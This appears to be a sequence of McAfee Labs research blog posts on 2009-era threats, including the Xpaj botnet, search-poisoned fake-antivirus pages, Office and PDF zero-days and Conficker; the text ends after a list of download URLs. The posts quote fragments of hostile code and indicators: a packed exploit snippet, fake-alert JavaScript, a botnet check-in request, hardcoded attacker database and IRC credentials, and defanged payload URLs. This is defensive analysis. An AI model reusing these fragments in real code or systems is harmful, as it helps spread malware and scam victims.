Two weeks ago I blogged about a new virus–W32/Xpaj–found in the wild by McAfee researchers and actively spreading around the world. Since then we have closely monitored the change in spread and severity of the virus, improved generic detection for future W32/Xpaj instances, and added cleaning and proper repair for all the files infected by the virus. Today I want to share more news related to this threat.

Further analysis has revealed some interesting details about the malicious behavior of W32/Xpaj. The Virus is building a widespread “zombie” network, by taking control thousands of Internet-connected computers. The new botnet is in its infancy, although thousands of machines have been infected during last two weeks. The botnet infects computers around the world and has spread across many countries. The attacks are mostly aimed at enterprises, but they have now spread to consumer machines as well. Based on multiple characteristics and our own research, the virus is most probably the work of eastern European cybercriminals.

Most bots are connected to a central location from where one machine can control the entire botnet. W32/Xpaj, on the other hand, deploys several control channels to communicate and control its bots. It employs the same techniques used by Srizbi and Conficker; that is, it uses randomly generated DNS names for backup control servers. Even though W32/Xpaj does not know where the control server is, it knows how to search for it, making it possible to predict which host is in use on a given day.

To prevent botnet hijacking, W32/Xpaj accepts only digitally signed payloads and commands. Malware authors use a cryptographic hash (MD5 algorithm) to validate the authenticity of any payload received from the control server).

Our analysis has not revealed any cryptology system to protect the payload, thus there is a chance for a rival to take control of the entire botnet.

The W32/Xpaj variants we analyzed use a sophisticated domain-generation algorithm to create and query the list of random domains starting on September 24. The virus first tries to resolve the domain name to an IP address. If that succeeds, it sends an HTTP request in the form of a string:

/GET /up.php?a=g2&cm=15A91F71

The malicious host responds with the path to a binary containing further instructions and code to be executed:

http://[infected]/stamm/stamm.dat

http://[infected]/plugin/plugin.dat

The first binary containing malicious instruction has already been received by all W32/Xpaj-infected machines. The virus stores the downloaded encrypted binary in the Windows folder. After decryption, the malicious code executes and instructs the virus to gather information about the infected machine and report to the server, sending the victim’s IP address, machine name, host process, registry records, current home page, and even fonts and path variables.

Every time an infected machine receives a payload and executes malicious code, a marker (a file with a random name) is created in the Windows folder, preventing the virus from executing the same payload twice.

Botnets grow and evolve quickly. We measure them by the number of compromised computers under their control. However, proactive virus detection and following these simple recommendations will help prevent your computer from becoming a part of a botnet:

• Keep your anti-virus software up to date
• Apply all the latest security patches and keep your operating system up to date
• Set up a firewall to block unauthorized access while you are connected to the Internet. Use strict firewall policies and allow only those connections–both incoming and outgoing–that are absolutely necessary for your business.

Although many security vendors struggled to release new signatures and cleaning support for this virus, McAfee customers are already protected. You will hear a lot more from us in the coming months, so stay tuned and keep reading our blogs.

Thanks to Abhishek Karnik, Rachit Mathur, Di Tian, Ivan Teblin, and Adrian Dunbar for their help in analyzing and defeating this threat.

McAfee Labs has discovered another attempt by ruthless malware authors to profit from disaster and tragedy.

While searching for information on the earthquakes and tsunami that struck the islands of American Samoa on 29 September, I saw the following results from the Google search engine:

Clicking on one of the links, which at first sight seem to be legitimate, would result in my machine displaying an alert for a possible infection:

What is actually happening behind the scenes of my browser (in this case Internet Explorer Version 8 on a patched Windows XP system) is that the link silently connects to a server hosted in Poland that loads an exploit obfuscated with the well-known Dean Edwards packer, which I covered in a blog last year.

This is a snippet of the exploit being loaded:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('28 61={"174":35,"295":35,"297":35,"614":35,"298":35,"233":-1,"272":"\\36\\21\\19\\36\\21\\19\\36\\36<!---->\\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36203 755\\21\\19 \\21\\19\\36\\36\\36752 131 461\\21\\19\\36\\36\\36754 726 282 645\\21\\19\\36\\36\\36787 13 795\\21\\19 \\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36796 576\\21\\19 \\21\\19\\36\\36\\36325 794 576\\21\\19\\36\\36\\36325 181\\21\\19\\36\\36\\36572 181\\21\\19\\36\\36\\36<17 31=

And this is a snippet of an interesting part of the unobfuscated version of the exploit:

{kPromo.alerts.minimizeWindow();alert("Warning! Your PC is at risk of virus and malware attack. \r\n \r\nYour system requires immediate check!\r\nSystem Security will perform a quick and free scan of your PC for viruses and malicious programs.");kPromo.alerts.maximizeWindow()};kPromo.alerts.showWindow=
function(e,c,b){if(!kPromo.instructions.property.isInstructionActive) if(kPromo.alerts.windows[e]==undefined){var a=(typeof(kPromo.alerts.windows.length)==undefined)?"alert_window_"+
kPromo.alerts.windows.length:"alert_window_0";
kPromo.alerts.windows[e]=kPromo.layouts.createLayer(a,c,b);kPromo.alerts.windows[e].foregroundContentLayer.appendChild
(kPromo.document.getDocumentElementByID(e));
kPromo.alerts.draggableItem.div=kPromo.alerts.windows[e].


The exploit in turn connects to a server hosted in China that downloads (with user interaction) an executable that turns out to be yet another variant of the fake anti-virus software Windows PC Defender. For details of that software, you can see a recently published VIL here.

After just a few minutes of the malware running, information such as the Windows Product ID and the Windows License Key on the system are sent to a server hosted in Russia.

It’s amazing how fast and well-prepared malware authors are nowadays. They seize opportunities that arise to exploit not only our machines but also our trust and confidence in the news. They make use of well-known techniques (such as search-engine optimization) strengthened by people’s emotions toward world-wide tragic events that are followed by millions (who are themselves victims of a lesser tragedy).

The use of social engineering to grab attention of recipients and to deliver malware is not something novel. The latest trend in spreading malware is to manipulate a happening celebrity story, disaster or other high profile news event. The threat could be delivered as emails or poisoned search engine results which leads to malware. In the past, we have come across innumerable incidents like Michael Jackson demise or Benazir Bhutto assassination used as an arena to spread malware. Lately, we have observed an increase in the number of OLE files being used as targeted attacks against various high profile users.

The exploit and lure claims to contain information on the Pakistani Air Force and arrives via email as a PowerPoint document attachment. When an unsuspecting user having a vulnerable version of PowerPoint launches the document, the vulnerability is exploited and the malicious payload is executed.

The vulnerability is with a malformed record within PowerPoint which can be exploited to execute malicious code. The shellcode makes use of the Process Environment Block (PEB) approach to determine the kernel32.dll base address as shown in the figure below.

Upon executing the file in a vulnerable version of PowerPoint, the shellcode decrypts itself and executes the malicious binary.

The malicious PPT file is exploiting an older vulnerability which was patched by Microsoft in ms06-028 bulletin. This attack is detected with the current DATS as Exploit-PPT.h and the dropped malicious executable is detected as BackDoor-EFB.

I revisited the topic of search-engine manipulation (a.k.a. blackhat SEO) in two recent posts. Something caught my eye while investigating cases of search-result poisoning–a shift away from tactics used by the attackers earlier in the year.

Previously, attackers mostly registered free websites to pull off their attacks. They would create a bunch of new sites, cross-link them, and use other tricks to get their pages indexed and ranked high on relevant search result pages (again, largely targeting the most popular search terms of the day, such as those found on Google Trends.) I blogged earlier in the year about how the user forum on democrats.org was leveraged to link a high-ranking site with newly created malicious sites.

It seems now that attackers are combing various elements of different attacks to achieve blackhat SEO.

There are currently many examples of high-ranking poisoned results that lead to compromised legitimate sites. This is a bit different than in the past, as now security vulnerabilities are being exploited simply for the sake of search-engine manipulation. 

Historically we’ve seen attackers upload malicious content to compromised sites, either directly by injected exploit code, or indirectly by injecting an iframe or script that brings in exploit code from a remote site.  Such situations can lead to site users notifying the compromised site administrator that they were attacked while visiting that site. Redirecting victims to a completely different site can help conceal the poisoned site.

The attackers go a step further by implementing a well used trick, which is to redirect conditionally.  It’s not enough for people to go to a compromised page; they must arrive there from a search-result page. In other words, users (or site admins) navigating to http://compromised-site.com/attacker_created_page will not be redirected to a payload site unless they are coming from a Google search-result page. 

Some of the compromised sites are running older, vulnerable phpBB and Word Press applications.  Others sites are serving attacker HTML pages, perhaps from compromised admin/user credentials or misconfigured web servers.

These events further blur the line between “trusted” sites and malicious content. This trend is likely to continue for years to come.

The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

The report reveals the truth behind the “Chinese pharmacy” spam:

• “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
• Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
• “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
• If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

• The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
• The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
• Brazil, Turkey, and India were among the top three domains from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack

Check out the full report here.

A new, remotely exploitable denial-of-service (DoS) vulnerability affecting BIND Version 9 was reported by ISC on July 28. It’s also reported that exploits have been seen in the wild.  Because BIND is widely used, these attacks can affect many critical infrastructures. Here’s a little description of the problem.

The vulnerability exists in the DNS dynamic-update request message. Dynamic update (RFC 2136) was implemented in DNS to deal with constantly updating DNS records in various DNS servers. The individual DNS servers can send update messages back to the DNS zone master so that the master record can remain current. Each update message should contain at least a zone record, a prerequisite record, and an update record. The zone record specifies which zone the update message is for. Only the zone master can update the record for itself. The prerequisite record specifies the condition in which the server should check before updating, and the update record contains the updated record.

The vulnerability that was reported yesterday exists due to the improper handling of a specially crafted DNS dynamic-update query. There are two conditions in the update query that need to be met for this packet to trigger the vulnerability: The victim’s DNS server must be the master of the zone specified in the update query packet; and the update query packet consists of a prerequisite record with the type “ANY.” ANY is not expected in any resource record because it’s defined only as a question type. The victim’s DNS server cannot handle this condition and shuts itself down. The attacker can cause a denial-of-service on the vulnerable DNS server with just one UDP packet. In fact, the attack will succeed even if dynamic update is disabled on the victim’s DNS server.

Patches are available from ISC for BIND Versions 9.4.3-P3, 9.5.1-P3, and 9.6.1-P1. Users and administrators should apply these patches immediately because the exploit is public.

McAfee Network Security Platform detects this attack using the signature set released on July 30 with the signature “DNS: ISC BIND 9 Dynamic Update Denial-of-Service Vulnerability.”

As we already mentioned multiple times in the past, exploits that take advantage of newly discovered holes in popular applications represent a growing threat to Internet users. Many, if not most, computer systems are vulnerable to these attacks. More evidence shows zero-day attacks remain the preferred choice of cybercriminals.

Today, a new unpatched Adobe vulnerability has been discovered in the wild. It takes advantage of a new feature to add interactive Flash (SWF) content into PDF files. This bug was found to affect at least Adobe Reader and Acrobat 9.1.2 , as well as Adobe Flash Player 9 or later.

In our investigation of the issue, we found that Acrobat 9 introduced a new “Rich Media” annotation type, which uses Acrobat’s built-in Flash Player to play SWF content. In the current attack, specially crafted SWF files were embedded into PDF documents. These can cause Adobe Reader to execute arbitrary code when viewed. When successful, shellcode in the exploit is executed by Adobe Reader. The picture below depicts how the shellcode works and what it does:

It first gets a KERNEL32.dll image base using the Windows PEB structure, sets up the required Windows APIs, then decrypts and executes its malware payload. This specific malicious PDF file contains three embedded executables encoded using a simple 1-byte XOR key. When run, it drops a file called SUCHOST.EXE and sends the information gathered from the infected machine to a free host-redirection service based in China:

• [blocked].3322.org
• [blocked].2288.org

The victim is then redirected to other malicious IP address(es). This malware acts as a backdoor to allow remote access to the infected computer.

According to Adobe, the Rich Media annotation is new to Acrobat 9.x and will not be understood by PDF document viewers that can support only up to Acrobat 8 specifications. Thus, if you place the SWF file with Acrobat 9 into the PDF files, it is not readable by Acrobat or Adobe Reader 8 and older versions, and will not be vulnerable to this attack.

Although details of this vulnerability have not yet become public, more attackers are likely to take advantage of this weakness. For McAfee customers, both the PDF and its associated payload can be proactively detected as “Exploit-PDF.t” since the 5683 DATs (released July 21).

Even though anti-malware vendors continue to add detection for new zero-day threats, there are several things you can do to mitigate such risks. Refrain from opening attachments from untrusted sources and visiting untrustworthy web sites.

This bug is currently being investigated by the Adobe Product Security Incident Response Team.

(Thanks to Abhishek Karnik and Aditya Kapoor for helping to analyze the malware.)

Today, Microsoft released a security advisory on active attacks in the wild using a vulnerability in Microsoft Office Web Components. Computers installed with Microsoft Office features that uses vulnerable versions of the Microsoft Office Web Components could be infected with malware when browsing upon malicious websites in Internet Explorer. 

From our investigation, Exploit-CVE2009-1136, a new 0-day exploit was added into web exploit toolkits that widely released Exploit-MSDirectShow.b  on hijacked websites in China just the previous week.  Since the start of this new wave of attacks, new trojans installed by Exploit-CVE2009-1136 has been detected by Artemis technology which also allow us to get a global view of the spread of this new threat.

In one of the new trojan samples used by Exploit-CVE2009-1136, we first saw Artemis queries coming from China at 11:53 GMT on July 13th, 2009. We didn’t have automatic protection for this at this point, but various systems analyzing the threat details soon mark this as malicious.

By now, this sample has spread to many other Internet users in China, and is now queried and blocked by Artemis more than 328 times at more than 145 unique IP addresses (ISP , not end point).

Besides China, we only saw Artemis queries coming from Virus Total (Spain) and fellow malware researchers in the UK and Germany in small numbers.

We will post more information as we receive it.

As a follow-up to our two recent blogs, we want to provide some details for this zero-day exploit from the perspective of the McAfee Network Security Platform (formerly known as IntruShield).

Unlike traditional ActiveX exploits, in this case the Microsoft Video ActiveX controls are being used to load malicious image files and trigger the vulnerability. McAfee Network Security Platform detects this exploit attempt using the attack signature HTTP: Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution. At this point, we have seen active attempts in the wild trying to exploit this vulnerability. Figure 1, below, shows one such attempt as viewed on the Alert Viewer and Figure 2, bottom, shows the corresponding packet capture from the evidence report.

Figure 1. Exploit attempt alert

Figure 2. Packet capture from evidence report

Microsoft Security Advisory 972890 says customers can set the kill bit for a bunch of Class Identifiers. Any attempt to use these Class Identifiers for exploitation can be detected using the audit signatures HTTP: Potential Harmful Microsoft Video ActiveX Control I, HTTP: Potential Harmful Microsoft Video ActiveX Control II, and HTTP: Potential Harmful Microsoft Video ActiveX Control III.

All of the attack signatures described above were released on July 6 in the following network security signature sets.
• 5.1.22.14
• 4.1.52.14

Adobe Flash applications have been a major security concern during the past couple of years. The large number of Flash vulnerabilities published, coupled with its popularity and wide distribution, makes Flash files an attractive target for cybercriminals. Infecting banner ads are not new; these Flash-based “malvertisements” have plagued adservers and popular websites for a very long time.

A malicious Flash file can be crafted to contain an image or an animation to fool unsuspecting users into believing the file is legitimate. Lately, we have observed a spike in the number of websites hosting malicious flash files that exploit the integer-overflow vulnerability in the DefineSceneAndFrameLabelData tag. These are popularly known as Exploit-CVE2007-0071.

Although the vulnerability has been fixed for some time, the bad guys are always coming up with new and progressive mechanisms to evade detection.

Flash Player 9 and later comes with a new virtual machine called ActionScript Virtual Machine 2 (AVM2), which is designed to execute programs written in the ActionScript 3.0 language. ActionScript 3.0 supports a native method called loadBytes().

The flash.display.Loader class supports the loadBytes method, which takes a byte array to fill the loader with data. The bytes injected can be in the form of GIF, JPG, PNG, or SWF files. Embedding the vulnerable SWF (small web format) file inside the loader provides attackers the multifold advantage of ensuring successful exploitation while complicating the analysis for researchers.

The image above shows the embedded malicious SWF file inside the loader file. This loader uses the loadBytes method to inject the bytes into the security context of the application.

In recent versions of the exploit, the embedded SWF file is encrypted using various obfuscation techniques such as byte-shifting algorithms or random XOR keys, as shown in the figure below.

We expect this trend to continue as cybercriminals target low-hanging fruit such as applications, and Flash is no exception. As always, make sure you are protected and the Flash player is updated to the latest version. Happy surfing .

In our blog from yesterday, we described how Exploit-MSDirectShow.b has been widely deployed on hijacked websites in China, targeting Internet Explorer users. When a victim browses one of these sites, malware is downloaded to the computer. To better understand the current impact of these attacks, we have monitored the prevalence of its downloaded malware through Artemis.

Since yesterday, our Artemis technology has detected new malware installed by Exploit-MSDirectShow.b that was targeted to certain geographical regions of the world.

In China, a new sample variant was queried by Artemis more than 180 times at more than 70 unique IP addresses (ISP, not end point) over a 24-hour period. This is represented by the many red dots in the following figure:

This particular sample was first seen only in mainland China, but we soon saw Artemis queries from Korea, Japan, Australia, Singapore, Taiwan, and the United States in very small numbers. As we know, the web has no boundaries and the potential risks of the DirectShow zero-day vulnerability is not limited to specific languages or regions. We will closely monitor this trend.

This sample is already heuristically detected in the DATs and Artemis. After our analysis, it has now been classified as Downloader-BRT Trojan.

Since we reported about the new attacks against Internet Explorer exploiting a vulnerability in a DirectShow ActiveX object, we have released DATs/coverage updates for many of our products and technologies.

Current status for each of the content areas:

• Malware: Coverage is provided for exploit code in the 5668 DATs, released on July 6
• HIPS: Generic buffer overflow should provide coverage
• McAfee Network Security Platform: Coverage was provided on July 6
• McAfee Vulnerability Manager: Coverage was provided on July 6
• MNAC: Coverage will be provided in the next release
• VirusScan Enterprise: Buffer overflow protection should provide coverage
• McAfee Web Gateway, Anti-Malware Edition: Behavior analysis provides coverage against currently known exploits

Other Internet users and website administrators can also download the free Stinger tool to scan computers and web pages for known malware relating to this attack:

• http://download.nai.com/products/mcafee-avert/stinger.exe

We will continue to monitor the situation to provide comprehensive coverage.

If you read Geok Meng and Xiaobo’s blog published in December last year, this must almost seem like a movie sequel. Over the July 4 weekend, an exploit targeting a zero-day vulnerability in the Microsoft Microsoft DirectShow ActiveX object was widely discovered on many Chinese websites.

At the time of research, over a hundred hijacked sites were found to be injected with malicious links that are still actively hosting this Trojan. Many of these sites are what you and I would not consider “malicious” or “dodgy.” For example, some of them are school websites or the local community club’s website that had been hijacked or infected.

When browsing these sites (hijacked site #1), the victim is hyperlinked to hijacked site #2, which seems to act as a proxy. In this case, if someone were to audit the source code of hijacked site #1, he or she would see that the links are connected to sites that look legitimate. Hijacked site #2 is, subsequently, hyperlinked to a malicious site hosting a web exploit toolkit.

During research, one of the things we found interesting was the web exploit toolkit explicitly checks that the origin of the hyperlinked references do not come from the “.gov.cn”  and “.edu.cn” domains, which are used by Chinese government and education sites, respectively. If the references are not coming from any of these domains, it starts sending a cocktail of exploits including:

• Exploit-MSDirectShow.b (zero-day)
• Exploit-XMLhttp.d
• Exploit-RealPlay.a
• JS/Exploit-BBar
• Exploit-MS06-014

Each of these exploits targets a different application that could be vulnerable–Internet Explorer 6 and 7, DirectShow ActiveX, RealPlayer, Baidu Toolbar–that can be accessed via the Internet Explorer browser.

From past investigations, this toolkit has been widely used on many Chinese hijacked sites this year. The attackers may be trying to avoid or delay attention from the Chinese government.

When successful, the attacker installs a downloader Trojan that could download other malware.

This zero-day vulnerability has been verified to affect at least Windows XP systems with Internet Explorer 6.x and 7.x. However, on IE 7, the browser on Windows Vista systems, risky ActiveX objects are blocked by default, which may mitigate this zero-day attack. Users should ensure that their systems are always kept up to date against the older exploits.

The zero-day exploit will be detected as Exploit-MSDirectShow.b by McAfee VirusScan in today’s 5668 DATs. The downloader Trojan installed by this exploit can be proactively detected as Generic.dx since the 5567 DATs (released March 28).

We will post more information as we receive it.

(Thanks to our colleague Wei Wang for assistance in this analysis.)

I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.

Yes, it is just another password-stealing Trojan. No need to get too excited. And, yes, we already detect this malware–as PWS-Banker.gen.i.

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Supervisory Control and Data Acquisition, or SCADA, stands for large-scale distributed remote processing systems that gather data in real time to control critical industrial, infrastructure, or facility processes and equipment. SCADA is used in power plants as well as in oil and gas refining, telecommunications, transportation, and water and waste control.

Stories about intruders who damage the power grid or any other key SCADA infrastructure frequently make the headlines. In the past, and like in Mexico in 2007, extraterrestrial creatures and flying saucers were occasionally blamed.

Since then, our enemies have changed. The Wall Street Journal reported in April that a federal audit of critical infrastructure facilities in the U.S. power industry had been compromised with software that would allow the attackers to disable key elements of the national power grid. “The Chinese have attempted to map our infrastructure, such as the electrical grid,” a U.S. senior intelligence official said on the occasion. One year ago, the CIA claimed that a cyberattack had caused a multicity power outage at an unspecified location outside the United States. The CIA story broke on May 14. It’s rumored that Hydro-Quebec was also a target of cyberspies.

Last week, I discovered a video posted on YouTube in November 2008.
We can see two guys hacking a central light system and then playing space invaders on it!

I have some doubts about the technical aspects of these light-show “attacks” on unprepared buildings. But fake or not, the video confirms that hackers and cybercriminals have got their eyes on SCADA networks. Perhaps the first demo was just for fun, but the others will have less juvenile goals. An attack can involve nationwide damage, a terrible effect on the public’s morale, and huge financial losses. Modern SCADA networks are more vulnerable than ever because they use open networking standards (such as TCP/IP), are now deployed under less secure operating systems (Windows), are connected to other networks (including Internet), and cannot be easily updated and rebooted.

For SCADA, which typically allows only a closely defined list of applications to run, a security approach that includes whitelisting can be a good solution. McAfee’s recent acquisition of Solidcore will help our customers in this area.

RSA is pretty much over now and it has been a blurry several days. Some real good sessions, some real good panels. Lots of meetings and interviews and many old friends on hand (shoutouts to Dave Perry, Larry Bridwell, and Lysa Myers), but I digress. …

For me the best event was the “Hacking Exposed” session, by Stuart McClure and George Kurtz. OK, I cop to being biased because I know and work with both these gents/slackers at McAfee, but they did show a really wild hack–they pwned a primary domain controller from an iPhone! Yep, you read that correctly. They hacked a Windows server FROM an iPhone.

For those who were not among the annointed and attended, I have uploaded the slide deck here. Stu and George recorded the hack as well:

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendez-vous to start its latest escapade. In this case, the infected host will be contacted initially by another host over an ad-hoc P2P connection. Kind of like an alarm clock. Then, after hitting the snooze button over a period of several hours, the communication begins again – starting this time from the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka update) may go unseen – or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the below screenshots:

We have also seen some hosts serving up a Waledac payload.(Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time however, it is closer to the original patch – so as to elude detection. (Note: our McAfee Conficker Detection tool is in process of being redesigned to allow detection of the latest variants).

There are also two other notes of interest. The first of which is that we have a new deadline to watch. On May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Such as – Is this just a test from the Conficker crew who are serving up Waledac incidentally? Or is this done for other self-serving reasons? (i.e. – Attention diversion) Maybe it’s just a deadline for a rented botnet? Interesting questions I am sure the security community at large is wondering.

Second, when an infected host resolves a HTTP rendez-vous domain name, it compares the IP resolved with the list of IPs it already queried, if the new IP is in the list, it will move on to the next domain in its list.

Of course, we will update if anything else comes along…

LuckySploit is an exploit framework that’s been in the news recently. As drive-by-downloads go, it lurks behind iframes and foists malware upon unsuspecting users.

One LuckySploit attack we analyzed downloaded the FakeAlert-BY Trojan. So if you visited a Web site today then saw this…

… then you are, unfortunately, infected with FakeAlert-BY, and possibly thanks to LuckySploit.

We detect the LuckySploit downloader as JS/Downloader-BNL in the 5580 DATs, to be released on April 10. We’ve had detection for FakeAlert-BY  since the 5545 DATs, released on March 6.

Please update your AV signatures and stay secure!

McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability, is available here.

For measures to protect yourself and your organization against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

We will continue to monitor this threat in our labs, and will update our blog with any new findings.

As a follow-up to my colleagues’ blog post about the newest Office exploits, here is an analysis of one of the Microsoft PowerPoint Zero-Day exploits that once again are used in targeted attacks to infect victims with a trojan horse. The malicious presentation files abuse a new, yet unpatched hole in Microsoft PowerPoint and causes it to execute code infiltrated by the attackers. This blog post shows how the shellcode works and what it does, right after an innocent victim opens the malicious file – if the attacker gets their way of course!

For size reasons, the code is split up into several parts that are scattered among the malicious PowerPoint file. Part one of the shellcode consists of an “egghunter”, which is used to relocate the remaining part of the shellcode in memory. In order to do that, it first sets up an exception handler that prevents crashes when accessing bad memory locations, then goes on a hunt for the shellcode’s prepended egg (0xD1CF11E0). Once that egg (which is a marker for the beginning of the shellcode’s second part) is found in memory, code execution is transfered to the code following it.

Part two of the shellcode begins with a loop that looks for a writable memory block of at least 1KB in size (starting at address 0×30000000). Another loop then XOR decodes another part of the shellcode into that memory location and branches to it. Once decoded, a filename (“fssm32.exe”) can be seen in the disassembly. In order to either download or drop a second-stage executable, shellcode needs access to operating system API functions. The ones it needs are going to be imported by parsing OS internal structures, such as the Process Environment Block, to locate kernel32.dll, then parsing the library’s PE header to locate the desired function pointers.

As shellcode mostly needs to fit into a size-limited block of memory, this piece of exploit not only has its code split into several parts for it to work reliably, it also uses 32bit hashes of API functions to import, rather than a list of respective function names which would consume more space. The shellcode’s ROR-13 hashing algorithm iterates over any exported API function name and compares it against its given list at run-time. Applying the same technique when statically analyzing shellcode, the list of imported functions becomes readable. Looking at the now readable list, it does not contain any function which would indicate the shellcode to download a file but rather drop an embedded one from the PowerPoint file and execute it.

Using a hex-search for typical indicators of an executable file, such as an “MZ” or “PE” header doesn’t yield any feasible results – which is not astonishing at all. Of course, the attackers responsible for having built the exploit intended to prevent their cover being blown by something as obvious as an executable that is embedded into a PowerPoint presentation file! By looking more closely at the shellcode, there is another suspicious XOR-decoding loop.

The loop decrypts a given memory block using an 8bit XOR key. By incorporating the same decryption-loop into a Python script and applying it to the PowerPoint file (see screenshot below), both an MZ- and PE header surface in the hex editor. It’s the embedded executable that was assumed to hide between the PowerPoint “slides” – the malware can finally be extracted.

McAfee VirusScan products detect this threat as Exploit-PPT.k trojan, McAfee Anti-Malware Gateway Edition (former Secure Computing) detects the new exploits as Heuristic.Exploit.OLE2.CodeExec.PGPG.

Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild.  Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe.  It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits in Windows XP Service Pack 2 and newer. We successfully detect this rootkit as Generic Rootkit.g trojan.  It then follows to establish an outbound connection with a remote IRC server using following credentials:

• PASS h4xg4ng
• NICK [00-USA-XP-9215671]
• USER SP2-ojd, followed by the name of the infected computer.

This worm exploits the MS08-067 vulnerability indeed, and uses a download-and-execute shellcode which behaves in an identical fashion as Conficker’s exploit, with only some differences in implementation. It is encoded using a simple 1-byte XOR key and looks like any other standard PEB shellcode which loads API libraries (i.e. urlmon.dll) and executes URLDownloadToFile() to download malware from already infected systems into new targets. Unlike Conficker which injects a downloaded DLL into running Windows processes, this worm downloads and installs a 66.scr executable file instead.

As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself.  The Metasploit framework has become a popular platform for security tools development and automation. As we can see, the latest version of Metasploit is not only used by whitehatsfor vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is not an exception, it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as dcerpc service connection testing code located in the “client.rb” module. By using these routines,  new worm can conveniently determine which operating system and service pack it is targeting to achieve a better infection success rate. The way how W32/IRCbot.gen.a ordered the attack packets is identical to Metasploit’s MS08-067 module  (ms08_067_netapi.rb):

Both Conficker and W32/IRCbot.gen.a uses open source tools similarly to their advantage to make their work much easier.

We went on to investigate additional sites where the worm is connecting to and the payload that it is trying to download. Packet sniffer logs shows that it accesses at least two other remote servers:

• hxxp://98.1[infected].42:443/n
• hxxp://74.2[infected].90:88/jueo.exe

While the first server is not showing any technical activity at the time of research, the second server is still active and hosts additional malware that is installed into infected machines:

